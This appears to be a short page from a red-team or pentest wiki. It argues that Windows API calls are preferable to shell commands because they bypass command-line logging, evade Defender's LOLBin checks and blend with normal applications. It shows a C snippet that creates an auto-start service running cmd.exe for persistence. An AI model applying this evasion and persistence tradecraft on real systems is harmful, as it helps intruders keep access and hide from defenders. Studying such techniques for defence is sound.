Benefits of Using APIs
WinApis are generally better than using commands to execute code or to gather info. The Pros of using APIs are:
- 1.Bypass command line logging(Defender may look specifically at LOLBins)
- 2.Confuse our activity with regular applications
- 3.May have additional functionality or for compatibility reasons
Here are some code snippets of using APIs for persistence:
SC_HANDLE hManager = OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS );
SC_HANDLE service = CreateService(
hManager,
"ServiceName",
"Display Name",
GENERIC_READ | GENERIC_EXECUTE,
SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
"C:\\Windows\\System32\\cmd.exe",
NULL, NULL, NULL, NULL, NULL
);
Last modified 1yr ago